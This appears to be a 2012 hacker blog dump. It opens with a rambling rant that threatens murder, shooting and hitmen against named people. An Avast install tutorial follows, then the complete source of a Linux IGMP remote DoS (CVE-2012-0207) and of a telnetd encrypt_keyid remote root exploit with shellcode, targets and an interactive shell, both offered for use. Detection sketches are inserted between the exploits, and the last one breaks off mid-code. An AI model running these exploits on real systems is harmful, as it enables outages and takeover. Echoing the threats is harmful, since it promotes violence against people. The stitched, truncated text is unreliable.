[NEWS]: Sabu/storm/crew ,are fucking dd0s skiddies! nothing BUT it! DONOT B SCARED OF THEM!

Posted on 27th January 2012 in Papers, Uncategorized

Hello WORLD and the news here in my areas… it seems what you wanted will finally happen, the first ever
ONLINE MURDER OF A HUMAN.
i will be leaving shortly for a 10year+ stretch for conspiracy to it, so i guess thisd is also a goodbye of some ssorts, but, fear nothing, it is only another 12 yrs or so, wich at that stage these kids will not really be able to walk well, if that atall :P

I will mention this… because i am JUSTiCE and will bring this, swiftly, in the night, n the sleep, of these people named…. it will be nothing but, blood on my hands, nfortunately for them, is only to me, another body i have watched die thru them…big fucking deal.. now this came thru these fuckwads, doing nothing it seems but ddos and ddos.overkill, and yes, i did admire them before i realised HOW theyre “hacking” , to use the skills of others…basically, whilst they ddos you on port 443, if you run https, this will “look” like you owned, and prettymuch have been…. so, i guess, do not run https nowdays unless ya know your shit :)

Unfortuanetly, is time for this ghrop of kids to go, as they offer nothing but *war* , it seems this is through and through and, as always…. a snippet of the attacks on me, overkilling mgood peoples pcs, just for ‘lols’, really, is this a professional group >???
#haxnet @ efnet.org , enjoy…
my true brothers, know WHO they are…

xxxx: we mudered every server xd touched last nite
xxxx: well sabu did
xxxx: i just watched and lol’d
xxxx: it was soo bad that xd paid 20$ to call me on my cell
xxxx: to say sorry and asked me to make it stop
friends: why dont you just leave it alone?
xxxx: its all done
xxxx: im not the one who did it
xxxx: and i didnt ask for it
xxxx: he just said hey watch this

I do believe xxxx: , and this is how Sab u , works :)
now, maybe you older people who are actually fking scared of this skiddy, well here, wannabe is written everywhere :P

Sabu_ is ~Sabu@phalse.2600.com * beg my pardon
Sabu_ on #hwa-security @#haxnet @+# #2600 @+#malicious @#OccupyIRC @#hacked @+#newyork +#security +#hackers
Sabu_ using irc.Prison.NET Prisoners of the Internet…
Sabu_ End of /WHOIS list.

storm_ is voodoo@vortex.dev-1.dhcp.net * * I’m too lame to read BitchX.doc *
storm_ on @#juped @#irish #geek @#hacked @#addict @#hipster @#phear @#syn @# @#overdose @#evil @#jupiter @#malicious
storm_ using irc.efnet.nl We worship Optimus Prime
storm_ is away: is away: (Auto-Away after 10 mins) [BX-MsgLog On]
storm_ End of /WHOIS list.
-

Says it all really…. and i aint touched anything this, is really the real, *crew* of this fuckwit :)
Theyrer still going to.. hehe, hitting a box setup to collect theyre ircds basically, this i was taught, by special person called mouse_ ,who is my love and my life…and, love ya baby.

Now… goto your local fucking whatevers, and,, the ppl with big $$$ who can pay hitmen etc, do NOT hesitate , for they will be, in deeper trouble than that + ddos + jail :)
I can only say for now, stay tuned, it will soon showup, every country, everywhere..how this *grou[p* rolls…. i am just, trying to give some support to those, who think they have been at mercy ofwannabe thugs…
i am 35+ years old, and have better things to *war* and am also, la casa.
I was born into it, so i CAN say these words… and i CAN promise death… it is nothing, 3+ and growing,
Respect for fallen brothers in arms _T , my friend you MUST stop the grog . but i love ya!
Talon and rotor ,also, are brothers i wish would give up this evil damn drug, i tried it 2 nights ago, to ‘remember’ the drunken feeling and, guess what this is how this shitst0rm has started :P hehehe… it is ok but now..
I will only say that, stay strong and beleive these words..
I dont play kids games and was forced into it by someone who i still do respect as he has shown restarint in wartime…

As for MY damn arse,
why do people sometimes come axcross the characters like this, is easy, we were born to act, and act swiftly, it is nothing but my blood, as i am IT citizen, not AU.
I have been inside HARD jail, HM Pentidge 8years to it, so am i going to let sme 16yr old w****s, annoy me !
Are YOU?
Having a blackbelt+ in MMA , may also have, sumthin todo with it :)

OH and I agree with the anti riaa etc, and anti sopa, they will fucking be wors than any crew, but, ddos, will OT solve it,. usa government, is alll fucking over it, it is done.. these idiots, should hack maybe, and not rely on , a nice younger girl, or others, to code theyre ‘tools’
Maybe, they should learn to a. use mutiple operating systems, and also maybe, know what theyre *tools* actually do…
i once asked storm, for his ‘ipv6 ddos.c’ wich was pvt, err did i say pvt, i meant, was a rip of ip6tunneldos.c ,and ipv6fuck.c ,he was actually angry because i asked for it, and this as like 1year ago… now let us see who has the longest memorys ;)
Go ahead and has it, it is setup for you, and was from the start setup for people of this calibre… to repeatedly overkill anyone of anything, will do nothing.

As once, someome VERY wise told me
“ddos only brings one thing…” , i took this, as more of a warning, and my respect now for this person, is igher than most others… because he showed me the truth to the errors people make Online.
Would you like done offline to your face, and could that guy even do shit to you offline ??

I doubt it, or else they would not be so darn loud on it.
Now you faghgots, i left a special password on a special pc, specially for these special people. It was no honeypot but, was just setup specially for this, and even has automated special features wich do things, specially on attack, i also left those scripts in ~./ for them to see, so, it is no damn wonder these reatrded mongoloidos, are nothing and will never be anything, until the losses are cut.. is simple.

the idiots bite… kekeke… it is going to be nothing but blood.. on hands… and, then i dont ‘lol’…rather, i pack your body into a desert, and, walk away crying… as, it is still taking life, of wich i hate tod… this one however, only regarded Uno telefonica al italia… e FATTO’.
For all the other Italians out there, dont ever underestimate yourself as i did my whole life… your power, is BRED into you it is only the nicety of character, wich is keeping you from attacking and i do know this my brothers….
La casa, e veramente nostra ….

Now, your kids who were all braggart online can enjoy the tastes of divine intervention OFFline where, there is no ezine to make you look great, but there is a shotgun of 100, or .44, your choice sir :) i can ask but, that would be foolish of me, so i will let you count the pellets put into the left knee of 2 people, one is in Usa and sabu .
You both, have committed suicide… I come from a long line of mafia bred italians, i dont think we are scared, atall, nor ever have been… we are for REAL, and bring the internet to ANY bully who does this, in ANY country.. just remember in America, who did stuff the Ballot boxes for half of your presidents ;)
go find out who… is quite.. interesting how was done, i mean, you must kow howmany people are in one place, it cannot be so hard to realise for every one person it was 100 people being voted :)

[TUTE]: Avast Antivirus Home Edition on PCLinuxOS 2011.6 (July/8/2011)

Posted on 19th January 2012 in Papers

Avast Antivirus Home Edition on PCLinuxOS 2011.6 // July 8th, 2011 // by Andy
Enjoy this awesome tute! Yea yea, so I did not bother to put pics in, so what.. it is simple, you just follow this and it's done! You need apt-get/apt, wget and an rpm manager, which should all be there for Debian and Ubuntu, so I should really call this one for LINUX OS! Also for CentOS, you COULD try using yum install, or simply copy install.. it should work on many distros that can handle rpm anyhow.. I'd avoid BSD tho atm… well, just atm… Enjoy the tute!

Yes yes yes… I know… Linux does not need antivirus software. True. BUT then – if You are dualbooting with Windows You may want to be able to check the other OS once in a while… Rootkits / malware / spyware / rogueware / viruses and so on and so forth… Even if You are not dualbooting, another way of using this would be to use Your remaster to check Your computers at home that are using Windows from the LiveCD / LiveDVD level… Seems useful, right? You can access the Windows partitions with read / write permissions under Your PCLinuxOS.
Nastiness cannot hide itself from the antivirus with a few entries in the registry… Sounds really good… So how does one install Avast on PCLinuxOS…
First we need to download a copy of it (it’s legal if You are using it at home on a non-commercial machine. For more info read the Terms and Conditions).

Open konsole and issue this command:
wget -c http://files.avast.com/files/linux/avast4workstation-1.3.0-1.i586.rpm
Now wait for it to finish downloading
Done right?

Now You need to gain root privileges. Issue this command:
su

Give root’s password when asked.
Now for the installation part issue this command:

apt-get install avast4workstation-1.3.0-1.i586.rpm

and wait for it to finish.
Done?

Now issue these two commands:

echo '' >> /etc/rc.local
echo 'echo 128000000 >/proc/sys/kernel/shmmax' >> /etc/rc.local
Done?

Close the konsole window and go to Kmenu. Type in ava in the search box.
There You go – that’s Your avast.
Click in it. Registration box will pop-up.
Click on the “Click here to obtain registration key” link.
You can choose which browser You want to use.
Fill out registration form correctly and wait for the e-mail from avast with Your product key.
Copy and paste the registration key into the Registration window and Ok it.
You have just installed Avast home edition for Linux workstations.
!DONE!

Close the avast window and reboot Your machine.
When it’s fully rebooted open Avast and upgrade / configure it to Your liking.

Upgraded and configured Avast Antivirus under PCLinuxOS 2011.6 KDE4

Avast does not have to be installed on KDE4.
It can be installed on any other DE available with PCLinuxOS.
If You want to You can scan the files from the command line… Type in avast --help
for more details and the command syntax.
Avast configuration files and viruses database are stored in the ~/.avast folder.
If the menu entry was not created and You are planning on creating Your own launcher use:
'avastgui' in the command box.

Icons are available here:
/usr/lib/avast4workstation/share/avast/icons/

GOOD STUFF!
Now you're protected, so set cron up and you're done!
XD

[DoS]: Code of ‘Undead’ attack by KCOPE But,this seems to be REMOTE not just lan based GREAT for learning about DoS ,about Icmp/Igmp/Tcp/IP,packet sequences,and how little it takes to flaw one

Posted on 18th January 2012 in Codes, Exploits

Ill just put the str8 up crappy PoC up, wich was on fdlists right ,wrong, this can attack OUTSIDE the Lan or Wlan :P
So, use some thinkin maybe update this post with your OWN version for a change
Go hard… i will have a closer look when i have more time, but, i know that my exploit for windows, is setup similar fashion and this, is simply because of the way igmp and icmp membership bugs read things, so, it had to be at the least 0.0.0.0, localhost,would fail…as thats an ip… so, i guess, goodluck!
XD

/*
** linux-undeadattack.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** credits to Ben Hutchings:
** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html
** THIS code wich can attack NOT just LAN, is NOT kcopes and, is based more on the ICMPv3 membership query bug... wich was for windows but also affects linux, in IMPv3 tho :P  go figure... anyhow, this can now be easily made into a very fast packet machine ,and since it doesnt care what the ips are, i guess could be seen results, remotely... feel free to update/send in comment... all comments, go thru ME, XD , before any type of publishing, so be sure that codes are safe and, i only put here, corrected codes...simple... so, please dont go adding it to your lame d0s collection coz, ill just fark it up , and, i mean, the packet is easy to block since it is released...right
XD loves u all
** Example:
** ./undeadattack SRC_IP DST_IP
** The Linux Kernel at the remote side will Panic
** when sent over the network -still in testing!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

struct iphdr {
  unsigned char ihl:4, version:4, tos;
  unsigned short tot_len, id, frag_off;
  unsigned char ttl, protocol;
  unsigned short check;
  unsigned int saddr, daddr;
  unsigned int options1;
  unsigned int options2;
};

struct igmp_query {
        unsigned char type;
        unsigned char maxresponse;
        unsigned short csum;
        unsigned int mcast;
        char padding[40];
};

// unsigned short in_chksum(unsigned short *, int);  // removed by xd , thx for trying to cripple but no work

unsigned short in_chksum(unsigned short *addr, int len);         // this was crippled, notice that this was uptop, so you dd not see the
                                                                 // bugged up in_chksum wich wont make this works :)  NOW try it.
unsigned short in_chksum(unsigned short *addr, int len) {
   register int nleft = len;
   register int sum = 0;
   u_short answer = 0;
   while (nleft > 1) {
      sum += *addr++;
      nleft -= 2;
   }
   if (nleft == 1) {
      *(u_char *)(&answer) = *(u_char *)addr;
      sum += answer;
   }
   sum = (sum >> 16) + (sum & 0xffff);
   sum += (sum >> 16);
   answer = ~sum;
   return(answer);
}

long resolve(char *);
long resolve(char *host) {
  struct hostent *hst;
  long addr;
  hst = gethostbyname(host);
  if (hst == NULL)
    return(-1);
  memcpy(&addr, hst->h_addr, hst->h_length);
  return(addr);
}

int main(int argc, char *argv[]) {
  struct sockaddr_in dst;
  struct iphdr *ip;
  struct igmp_query *igmp;
  long daddr, saddr;
  int s, i=0, c, len, one=1;
  char buf[1500];
  if (argc < 3) {
    printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
   "credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
    printf("Usage: %s <src ip> <dst ip>\n", *argv); // yea, try any ip and see, i guess its worth a shot... or not :P
    return(1);
  }
  daddr = resolve(argv[2]);
  saddr = resolve(argv[1]);
  memset(buf, 0, 1500);
  ip = (struct iphdr *)&buf;
  igmp = (struct igmp_query*)&buf[sizeof(struct iphdr)];
  dst.sin_addr.s_addr = daddr;
  dst.sin_family = AF_INET;
  ip->ihl = 7;
  ip->version = 4;
  ip->tos = 0;
  ip->tot_len = htons(sizeof(struct iphdr)+8);
  ip->id = htons(18277);
  ip->frag_off=0;
  ip->ttl = 1;
  ip->protocol = IPPROTO_IGMP;
  ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
  ip->saddr = saddr;
  ip->daddr = daddr;
  ip->options1 = 0;
  ip->options2 = 0;
  igmp->type = 0x11;
  igmp->maxresponse = 0xff;
  igmp->mcast=inet_addr("0.0.0.0");  // mod here ,now we can attack the IP we actually put in
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 8);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  close(s);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  ip->id = htons(18278);
  ip->tot_len = sizeof(struct iphdr)+12;
  igmp->type = 0x11;
  igmp->maxresponse = 0;
  igmp->mcast=inet_addr("0.0.0.0");
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 12);
  printf("Sending packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  return(0);
}
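
For the receiving side, a detection sketch added here (not code from the original post or from any of the authors it credits): it classifies a captured IPv4 packet as an IGMP query by length and max-response byte, and alerts on the sequence the code above emits, an 8-byte query followed by a 12-byte query with max response 0. The function names, the one-watch-per-interface state and the sample packets (documentation addresses, zero checksums) are assumptions constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum igmp_kind {
    PKT_MALFORMED,       /* truncated or inconsistent IPv4/IGMP lengths */
    PKT_NOT_IGMP,
    IGMP_NOT_QUERY,
    IGMP_QUERY_V1,       /* 8 bytes, max response == 0 */
    IGMP_QUERY_V2,       /* 8 bytes, max response != 0 (first packet above) */
    IGMP_QUERY_V3,       /* >= 12 bytes, max response != 0 */
    IGMP_QUERY_V3_ZERO   /* >= 12 bytes, max response == 0 (second packet above) */
};

/* Classify one raw IPv4 packet. The header length is taken from IHL, not
 * assumed to be 20: the packets above carry options (ihl = 7, 28 bytes). */
enum igmp_kind classify_igmp(const uint8_t *pkt, size_t caplen)
{
    if (caplen < 20 || (pkt[0] >> 4) != 4) return PKT_MALFORMED;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    size_t tot = ((size_t)pkt[2] << 8) | pkt[3];
    if (ihl < 20 || ihl > tot || tot > caplen) return PKT_MALFORMED;
    if (pkt[9] != 2) return PKT_NOT_IGMP;            /* IPPROTO_IGMP */
    size_t igmp_len = tot - ihl;
    if (igmp_len < 8) return PKT_MALFORMED;
    if (pkt[ihl] != 0x11) return IGMP_NOT_QUERY;     /* membership query */
    uint8_t max_resp = pkt[ihl + 1];
    if (igmp_len == 8) return max_resp ? IGMP_QUERY_V2 : IGMP_QUERY_V1;
    if (igmp_len < 12) return PKT_MALFORMED;         /* neither v2 nor v3 */
    return max_resp ? IGMP_QUERY_V3 : IGMP_QUERY_V3_ZERO;
}

/* Per-interface state (assumption: one watch per monitored interface). */
struct igmp_watch { int old_query_seen; unsigned alerts; };

/* Returns 1 when a zero-max-response v3 query follows an older-version query. */
int igmp_watch_feed(struct igmp_watch *w, const uint8_t *pkt, size_t caplen)
{
    switch (classify_igmp(pkt, caplen)) {
    case IGMP_QUERY_V1:
    case IGMP_QUERY_V2:
        w->old_query_seen = 1;
        return 0;
    case IGMP_QUERY_V3_ZERO:
        if (!w->old_query_seen) return 0;
        w->alerts++;
        return 1;
    default:
        return 0;
    }
}

/* Constructed test input only: fills buf (>= 64 bytes) with an IPv4 header of
 * ihl_words words plus an igmp_len-byte query. Checksums stay zero. */
size_t build_sample(uint8_t *buf, uint8_t ihl_words, uint8_t proto,
                    uint8_t max_resp, size_t igmp_len)
{
    size_t ihl = (size_t)ihl_words * 4, tot = ihl + igmp_len;
    memset(buf, 0, tot);
    buf[0] = (uint8_t)(0x40 | ihl_words);
    buf[2] = (uint8_t)(tot >> 8);
    buf[3] = (uint8_t)(tot & 0xff);
    buf[8] = 1;                                       /* TTL */
    buf[9] = proto;
    buf[12] = 192; buf[13] = 0; buf[14] = 2; buf[15] = 1;   /* 192.0.2.1 */
    buf[16] = 192; buf[17] = 0; buf[18] = 2; buf[19] = 2;   /* 192.0.2.2 */
    buf[ihl] = 0x11;
    buf[ihl + 1] = max_resp;
    return tot;
}

int main(void)
{
    uint8_t first[64], second[64];
    struct igmp_watch w = { 0, 0 };
    size_t n1 = build_sample(first, 7, 2, 0xff, 8);
    size_t n2 = build_sample(second, 7, 2, 0x00, 12);
    printf("first:  kind=%d alert=%d\n", classify_igmp(first, n1),
           igmp_watch_feed(&w, first, n1));
    printf("second: kind=%d alert=%d\n", classify_igmp(second, n2),
           igmp_watch_feed(&w, second, n2));
    return 0;
}
```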

telnetd-encrypt_keyid.c with ~12 targets

Posted on 8th January 2012 in Exploits

The famous ‘targets’ copy i was apparently keeping from everyone… enjoy (with targets! and even addable targets!) !

/*
 *            telnetd-encrypt_keyid.c
 *  Mon Dec 26 20:37:05 CET 2011
 *  Copyright  2011  Jaime Penalba Estebanez (NighterMan)
 *  Copyright  2011  Gonzalo J. Carracedo (BatchDrake)
 *  nighterman@painsec.com - jpenalbae@gmail.com
 *  BatchDrake@painsec.com - BatchDrake@gmail.com
*/
/*
 * Usage:
 * $ gcc exploit.c -o exploit
 * $ ./exploit 127.0.0.1 23 1
 * [<] Succes reading intial server request 3 bytes
 * [>] Telnet initial encryption mode and IV sent
 * [<] Server response: 8 bytes read
 * [>] First payload to overwrite function pointer sent
 * [<] Server response: 6 bytes read
 * [>] Second payload to triger the function pointer
 * [*] got shell?
 * uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/*
 * Most of the inetd impletantions have a connection limit per second
 * so you must chage this if you start getting errors reading responses
 *  - for 60 conex per min  900000
 *  - for 40 conex per min 1500000
 *  - for no limit 300000 should work
 */
#define BRUTE_TOUT 600000  // seems pretty fair on cpu ..
#define MAXKEYLEN 64-1

struct key_info {
  unsigned char keyid[MAXKEYLEN];
  unsigned char keylen[4];
  unsigned char dir[4];
  unsigned char modep[4];
  unsigned char getcrypt[4];
};
struct target_profile {
  uint32_t      skip;
  const char    *address;
  const char    *desc;
  const char    *shellcode;
};

/* Shellcode FreeBSD x86 */
const char s_bsd32[] =
   "\x31\xc0"                      // xor          %eax,%eax
   "\x50"                          // push         %eax
   "\xb0\x17"                      // mov          $0x17,%al
   "\x50"                          // push         %eax
   "\xcd\x80"                      // int          $0x80
   "\x50"                          // push         %eax
   "\x68\x6e\x2f\x73\x68"          // push         $0x68732f6e
   "\x68\x2f\x2f\x62\x69"          // push         $0x69622f2f
   "\x89\xe3"                      // mov          %esp,%ebx
   "\x50"                          // push         %eax
   "\x54"                          // push         %esp
   "\x53"                          // push         %ebx
   "\x50"                          // push         %eax
   "\xb0\x3b"                      // mov          $0x3b,%al
   "\xcd\x80";                     // int          $0x80

/* Shellcode Linux x86 */
const char s_linux32[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

/* Shellcode Linux sparc */
const char s_linuxsparc[] = "\x2d\x0b\xd8\x9a"  /* sethi %hi(0x2f626800), %l6 */
                            "\xac\x15\xa1\x6e"  /* or %l6, 0x16e, %l6         */
                            "\x2f\x0b\xdc\xda"  /* sethi %hi(0x2f736800), %l7 */
                            "\x90\x0b\x80\x0e"  /* and %sp, %sp, %o0          */
                            "\x92\x03\xa0\x08"  /* add %sp, 0x08, %o1         */
                            "\x94\x22\x80\x0a"  /* sub %o2, %o2, %o2          */
                            "\x9c\x03\xa0\x10"  /* add %sp, 0x10, %sp         */
                            "\xec\x3b\xbf\xf0"  /* std %l6, [ %sp + - 16 ]    */
                            "\xd0\x23\xbf\xf8"  /* st %o0, [ %sp + - 8 ]      */
                            "\xc0\x23\xbf\xfc"  /* clr [ %sp + -4 ]           */
                            "\x82\x10\x20\x3b"  /* mov 0x3b, %g1              */
                            "\x91\xd0\x20\x10"; /* ta 0x10                    */

/* Valid targets list */
struct target_profile targets[] = {
  {20, "\x00\x80\x05\x08", "Generic Linux i386 bruteforce", s_linux32},
  {20, "\x00\x80\x05\x08", "Generic BSD i386 bruteforce", s_bsd32},
  {20, "\x23\xcc\x05\x08", "Ubuntu GNU/Linux 10.04, Inetutils Server (i386)", s_linux32},
  {20, "\x12\xc9\x05\x08", "Ubuntu GNU/Linux 10.04, Heimdal Server (i386)", s_linux32},
  {20, "\xef\x56\x06\x08", "Debian GNU/Linux stable 6.0.3, Inetutils Server (i386)", s_linux32},
  {20, "\x56\x9a\x05\x08", "Debian GNU/Linux stable 6.0.3, Heimdal Server (i386)", s_linux32},
  {1,  "\x00\x03\xe7\x94", "Debian GNU/Linux stable 6.0.3 Inetutils (SPARC)", s_linuxsparc},
  {3,  "\x00\x03\x2e\x0c", "Debian GNU/Linux stable 6.0.3 Heimdal Server (SPARC)", s_linuxsparc},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.0 (i386)", s_bsd32},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.1 (i386)", s_bsd32},
  {20, "\xed\xee\x05\x08", "FreeBSD 8.2 (i386)", s_bsd32},
  {20, "\x02\xac\x05\x08", "NetBSD 5.1 (i386)", s_bsd32},
  {0, NULL, NULL, NULL}
};

/* Telnet commands */
static unsigned char tnet_init_enc[] =
        "\xff\xfa\x26\x00\x01\x01\x12\x13"
        "\x14\x15\x16\x17\x18\x19\xff\xf0";

static unsigned char tnet_option_enc_keyid[] = "\xff\xfa\x26\x07";
static unsigned char tnet_end_suboption[] = "\xff\xf0";

/* Check if the shellcode worked, slightly simpler than shell (int) */
static int checkmagic (int fd) {
  char got[32];
  if (write (fd, "echo foo\n", 9) < 0)
    return -1;
  if (read (fd, got, 32) <= 0)
    return -1;
  return -!strstr (got, "foo");
}

static void shell(int fd) {
    fd_set  fds;
    char    tmp[128];
    int n;
    /* check uid */
    write(fd, "id\n", 3);
    /* semi-interactive shell */
    for (;;) {
        FD_ZERO(&fds);
        FD_SET(fd, &fds);
        FD_SET(0, &fds);
        if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
            perror("select");
            break;
        }
        /* read from fd and write to stdout */
        if (FD_ISSET(fd, &fds)) {
            if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
                fprintf(stderr, "Goodbye..\n");
                break;
            }
            if (write(1, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
        /* read from stdin and write to fd */
        if (FD_ISSET(0, &fds)) {
            if ((n = read(0, tmp, sizeof(tmp))) < 0) {
                perror("read");
                break;
            }
            if (write(fd, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
    }
}

static int open_connection(in_addr_t dip, int dport) {
   int pconn;
   struct sockaddr_in cdata;
   struct timeval timeout;
   /* timeout.tv_sec  = _opts.timeout; */
   timeout.tv_sec  = 8;
   timeout.tv_usec = 0;
   /* Set socket options and create it */
   cdata.sin_addr.s_addr = dip;
   cdata.sin_port = htons(dport);
   cdata.sin_family = AF_INET;
   pconn = socket(AF_INET, SOCK_STREAM, 0);
   if(pconn < 0) {
   printf("Socket error: %i\n", pconn);
   printf("Err message: %s\n", strerror(errno));
   return (-1);
   }
   /* Set socket timeout */
   if ( setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO,(void *)&timeout, sizeof(struct timeval)) != 0)
   perror("setsockopt SO_RCVTIMEO: ");
   /* Set socket options */
   if ( setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO,(void *)&timeout, sizeof(struct timeval)) != 0)
   perror("setsockopt SO_SNDTIMEO: ");
   /* Make connection */
   if (connect(pconn,(struct sockaddr *) &cdata, sizeof(cdata)) != 0) {
   close(pconn);
   return -1;
   }
   return pconn;
}

static void usage(char *arg) {
    int x = 0;
    printf("Available Targets:\n\n");
    /* print tagets */
    while(targets[x].address != NULL) {
    printf("  %2i: %s\n", x + 1, targets[x].desc);
    x++;
    }
    printf("\n");
    printf("Telnetd encrypt_keyid exploit\n");
    printf("Usage: %s [IP] [Port] [Target]\n\n", arg);
}

int attack (const char *ip, unsigned int port,unsigned char *payload, unsigned int psize, int tryshell) {
  unsigned char readbuf[256];
  int ret;
  int conn;
  /* Open the connection */
  conn = open_connection(inet_addr(ip), port);
  if (conn == -1) {
  printf("[-] Error connecting: %i\n", errno);
  return -1;
  }
  /* Read initial server request */
  ret = read(conn, readbuf, 256);
  if (ret <= 0) {
  printf ("[!] Error receiving response: %s\n", ret ? strerror (errno) : "empty response");
  close (conn);
  return -1;
  }
  printf("[<] Success reading intial server request %i bytes ..\n", ret);
  /* printf("ATTACH DEBUGGER & PRESS KEY TO CONITNUE\n"); */
  /* ret = getchar(); */
  /* Send encryption and IV */
  ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc));
  if (ret != sizeof(tnet_init_enc)) {
  printf("[-] Error sending init encryption: %i\n", ret);
  close (conn);
  return -1;
  }
  printf("[>] Telnet initial encryption mode and IV sent\n");
  /* Read response */
  if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN) {
  printf ("[!] Timeout when receiving response\n");
  close (conn);
  return -1;
  } else
  printf("[<] Server response: %i bytes read\n", ret);
  /* Send the first payload with the overflow */
  ret = write(conn, payload, psize);
  if (ret != psize) {
  printf("[-] Error sending payload first time\n");
  close (conn);
  return -1;
  }
  printf("[>] First payload to overwrite function pointer sent\n");
  /* Read Response */
  if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN) {
  printf ("[!] Timeout when receiving response ..\n");
  close (conn);
  return -1;
  }
  else
  printf("[<] Server response: %i bytes read\n", ret);
  /* Send the payload again to tigger the function overwrite */
  ret = write(conn, payload, psize);
  if (ret != psize) {
  printf("[-] Error sending payload second time ..\n");
  close (conn);
  return -1;
  }
  printf("[>] Second payload to trigger the function pointer ..\n");
  if (tryshell) {
  /* Start the semi interactive shell */
  printf("[*] Got root?\n");
  shell(conn);
  ret = 0;
  } else {
  printf ("[*] Does this work? ");
  /* Just check if it works */
  if (checkmagic (conn) == 0) {
  printf ("YES!\n");
  printf ("Add the Target address to the targets list & recomple!\n");
  ret = 0;
  } else {
  printf ("[-] Nope,try again ..\n");
  ret = -1;
  }
  }
  close (conn);
  return ret;
}

int main(int argc, char *argv[]) {
      int offset = 0;
      int target;
      int i;
      unsigned int address;
      /* Payload Size */
      int psize = (sizeof(struct key_info) +
      sizeof(tnet_option_enc_keyid) +
      sizeof(tnet_end_suboption));
      struct key_info bad_struct;
      unsigned char payload[psize];
      if (argc != 4) {
      usage(argv[0]);
      return -1;
      }
      /* Fill the structure */
      memset(&bad_struct, 0x90, sizeof(struct key_info));
      memcpy(bad_struct.keylen,   "DEAD", 4);
      memcpy(bad_struct.dir,      "BEEF", 4);
      target = atoi(argv[3]) - 1;
      /* Target selection */
      struct target_profile *t;
      t = &targets[target];
      printf("Target: %s\n\n", t->desc);
      for (i = 0; !i || target < 2; i++) {
      offset = 0;
      memcpy(&bad_struct.keyid[t->skip], t->shellcode, strlen(t->shellcode));
      memcpy (&address, t->address, 4);
      address += ((i + 1) >> 1) * (t->skip - 1) * (1 - ((i & 1) << 1));
      printf ("[*] Target address: 0x%04x\n", address);
      memcpy(bad_struct.modep, &address, 4); /* Readable address */
      memcpy(bad_struct.getcrypt, &address, 4); /* Function pointer */
      /* Prepare the payload with the overflow */
      memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid));
      offset += sizeof(tnet_option_enc_keyid);
      memcpy(&payload[offset], &bad_struct, sizeof(bad_struct));
      offset += sizeof(bad_struct);
      memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption));
      if (attack (argv[1], atoi (argv[2]), payload, psize, target >= 2) == 0)
      break;
      usleep (BRUTE_TOUT);
    }
    return 0;
}

ENJOY! The ‘pvt’ socalled version ;)
XD
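
A detection sketch for the traffic this code produces, added here and not part of the original exploit or its authors' work: the payload is a telnet ENCRYPT (0x26) suboption with subcommand 0x07 whose key id is a whole struct key_info, so a stream scanner can flag key-id suboptions longer than a sane limit. The 64-byte KEYID_LIMIT, the function names and the sample streams (filler bytes only) are assumptions constructed for the example; subcommands 0x07 and 0x08 are the ENC_KEYID and DEC_KEYID codes of the telnet encryption option.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define TN_IAC          0xff
#define TN_SB           0xfa
#define TN_SE           0xf0
#define TELOPT_ENCRYPT  0x26
#define ENC_KEYID       0x07
#define DEC_KEYID       0x08
#define KEYID_LIMIT     64     /* assumed maximum legitimate key id length */

/* Scan client-to-server telnet bytes. Returns how many ENCRYPT key-id
 * suboptions carry more than KEYID_LIMIT bytes; *longest receives the longest
 * key id seen. Unterminated suboptions are measured up to the end of data. */
size_t count_oversize_keyids(const uint8_t *s, size_t n, size_t *longest)
{
    size_t hits = 0, i = 0;
    *longest = 0;
    while (i + 1 < n) {
        if (s[i] != TN_IAC) { i++; continue; }
        uint8_t cmd = s[i + 1];
        if (cmd >= 0xfb && cmd <= 0xfe) { i += 3; continue; } /* WILL..DONT opt */
        if (cmd != TN_SB) { i += 2; continue; }   /* IAC IAC or 2-byte command */
        if (i + 2 >= n) break;
        uint8_t opt = s[i + 2], sub = 0;
        size_t j = i + 3, datalen = 0;
        while (j < n) {
            if (s[j] == TN_IAC) {
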